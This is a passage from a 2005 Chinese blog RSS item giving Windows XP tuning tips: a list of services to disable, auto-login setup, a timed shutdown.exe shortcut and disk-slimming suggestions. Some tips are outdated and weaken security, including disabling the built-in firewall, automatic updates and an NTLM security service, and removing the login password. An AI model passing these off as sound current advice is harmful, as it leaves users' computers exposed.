/>SmartCardHelper-智能卡帮助，手动 <br />SystemRestoreService-系统还原服务，自己决定。我选禁用 <br />TCP/IPNetBIOSHelper-如果你的网络不用Netbios或WINS，就禁用 <br />UninterruptiblePowerSupply-UPS用的吧。手动 <br />UploadManager-用来实现服务器和客户端输送文件，简单文件传输不需要这个！手动 <br />VolumeShadowCopy-同MSSoftwareShadowCopyProvider。手动 <br />WebClient-不清楚，我用手动 <br />windowsTime-网上时间校对。手动 <br />WirelessZeroConfiguration-无线网络设置服务。手动 <br />WMIPerformanceAdapter-不清楚。手动 </p><p>winxp专业版的各标准服务简介 <br />alerter-错误警报器。禁用 <br />applicationlayergatewayservice-有些防火墙/网络共享软件需要。手动 <br />applicationmanagement-用于设定，发布和删除软件服务。手动 <br />automaticupdates-windows自动更新，不影响手动更新。禁用 <br />backgroundintelligenttransferservice-后台智能传输。手动 <br />clipbook-与局域网电脑共享粘贴/剪贴的内容。禁用 <br />Com+Eventsystem　-很多软件需要。自动 <br />COM+Eventsystemapplication　-和上面的差不多，但不是那么重要。手动 <br />ComputerBrowser-用来浏览局域网的服务，但关了也不影响浏览！手动 <br />CryptographicServices-windows更新时用的。手动 <br />DHCPClient-局域网域用户和宽带adsl拨号可能需要。手动 <br />Distributedlinktrackingclient－用于局域网更新连接信息。手动 <br />DistributedTransactioncoordinator－并行处理使用，如果你不是服务器的话，就禁用 <br />DNSClient－ＤＮＳ解析服务。服务器用。手动 <br />Errorreportingservice-错误报告器。禁用 <br />EventLog-系统日志纪录服务，用于查找系统毛病．自动 <br />Fastuserswitchingcompatibility－多用户快速切换服务，不如用注销了。禁用 <br />helpandsupport-帮助。手动 <br />Humaninterfacedeviceaccess－支持多媒体键盘等HID设备。手动 <br />IMAPICD-burningCOMservice　－有其他的刻录软件就不需要了。禁用 <br />Indexingservice-索引服务，用于快速查找文件，关闭也能查。手动 <br />InternetConnectionFirewall(ICF)-xp防火墙，没什么用。禁用 <br />IPSECServices－安全方面的。手动 <br />LogicalDiskmanager　－磁盘管理服务。手动 <br />LogicalDiskmanageradministrativeservice－同上。手动 <br />messenger-局域网内利用netsend命令传递消息。禁用 <br />MSsoftwareshadowcopyprovider－软件备份。禁用 <br />NetLogon－登陆domain，如果局域网是工作组方式或是个人用户，请禁用 <br />Netmeetingremotedesktopsharing－用Netmeeting实现电脑共享。禁用 <br />NetworkConnections-上网／局域网要用的！自动 <br />NetworkDDE　和NetworkDDEDSDM　－禁用 <br />NetworkLocationAwareness－如有网络共享或ICS/ICF可能需要.(服务器端）手动 <br />NTLMSecuritysupportprovider－安全方面的。禁用 <br />NVIDIADriverHelperservice-nvidia显卡帮助，禁用 <br />Performancelogsandalerts－记录机器运行状况而且定时写入日志或发警告。手动 <br />PlugandPlay-自动检测新装硬件。自动 <br />Portablemediaserialnumber－禁用 <br />PrintSpooler-打印机服务，关掉就无法打印了，视情况而定。手动 <br />ProtectedStorage－储存本地和网上服务密码，包括填表时的&amp;quot;自动完成&amp;quot;等功能。自动 <br />QoSRSVP-个人用户用不着。手动 <br />Remoteaccessautoconnectionmanager－我是ADSL，设成了手动 <br />Remotedesktophelpsessionmanager－远程帮助服务，禁用 <br />RemoteProcedureCall(RPC)-系统核心服务！自动 <br />RemoteProcedureCallLOCATOR－管理RFC数据库服务，手动 <br />remoteregistry－远程注册表运行／修改。大漏洞，禁用 <br />removablestorage　－磁带备份用的。禁用 <br />routingandremoteaccess－路由服务。禁用 <br />secondarylogon－给与administrator以外的用户分配指定操作权．手动 <br />securityaccountsmanager－像ProtectedStorage,IISAdmin才需要。手动 <br />server-局域网文件／打印共享需要的。自动 <br />shellhardwaredetection－不清楚，自动 <br />smartcard-智能卡服务，我没用过。手动 <br />smartcardhelper-智能卡帮助，手动 <br />SSDPDiscoveryservice－没有什么硬件利用这个服务。禁用 <br />systemeventnotification－记录用户登录／注销／重起／关机信息。视情况定。手动 <br />systemrestoreservice-系统还原服务，自己决定。我选禁用 <br />taskscheduler－windows计划任务。禁用 <br />TCP/IPNetBIOShelper－如果你的网络不用Netbios或WINS，就禁用 <br />Telephony-拨号服务，如果你的宽带不用拨号，那么关了它。 <br />Telnet-大漏洞，这和dos中telnet命令没关系。禁用 <br />terminalservices－实现远程登录本地电脑，快速用户切换和远程桌面功能需要。禁用 <br />themes-关掉了就没有漂亮的界面了。自动 <br />uninterruptiblepowersupply－UPS用的吧。手动 <br />universalplugandplaydevicehost－同SSDPDiscoveryService。禁用 <br />uploadmanager－用来实现服务器和客户端输送文件，简单文件传输不需要这个！手动 <br />volumeshadowcopy－同MSSoftwareShadowCopyProvider。手动 <br />webclient－不清楚，我用手动 <br />WindowsAudio-　关了就没声音了！自动 <br />WindowsInstaller-windows的ＭＳＩ安装服务，手动 <br />windowsimageacquisition(WIA)-扫描仪用的，但是大多数都不需要。手动 <br />WindowsManagementInstrumentation-核心服务。自动 <br />windowsmanagementinstrumentationdriverextensions－没上面的重要，手动 <br />windowstime-网上时间校对。手动 <br />wirelesszeroconfiguration-无线网络设置服务。手动 <br />WMIperformanceadapter-不清楚。手动 <br />Workstation-很多服务都依靠这个服务，支持联网和打印／文件共享的。自动</p><p>27。自动登陆 </p><p>单击开始→运行，输入&amp;quot;rundll32 netplwiz.dll,UsersRunDll&amp;quot;（不带引号），然后在User Accounts中取消&amp;quot;Users must enter a user name and password to usethis computer&amp;quot;，单击&amp;quot;OK&amp;quot;，接着在弹出的对话框中输入你想自己登陆的用户名和密码即可。 </p><p>28。快速关机或重启的快捷键（可定时） </p><p>在桌面点击鼠标右键，选择新建快捷方式，在弹出的向导中输入位置为：C:WINDOWSsystem32shutdown.exe -s -t 10（其中的-s可以改为-r，也就是重新启动，而-t 10表示延迟10秒，你可以根据自己的需要更改这个数字）。制作完这个快捷键后，按照上面的方法为它指定一个图标。这个快速关机或重启的技巧会显示一个比较漂亮的对话框提示关机（重启），而且你可以在后面加上&amp;quot;-c &amp;quot;我要关机啦！&amp;quot;&amp;quot;，这样这句话会显示在对话框中，当然文字你可以随意写，但要注意不能超过127个字符</p><p><br />29。还有建议使用GHOST备份系统~<br />&amp;#160;&amp;#160;&amp;#160; 建议是XPlite进行WINDOWSXP瘦身把那些你认为没用的想删除又删不掉WINDOWS组文件~<br />&amp;#160;&amp;#160;&amp;#160; 原本WINDOWSXP大概需要两个GB 可是如果用我们所介绍的优化方法优化的话你会发现哇WINDOWS只省下1.2G左右拉~哈哈~</p>]]></description> 
<guid isPermaLink="false">1059306@http://maxgo.bokee.com/</guid> 
<dc:subject>系统知识</dc:subject> 
<dc:date>2005-03-30T19:04:29Z</dc:date> 
</item> 

</channel> 
</rss> 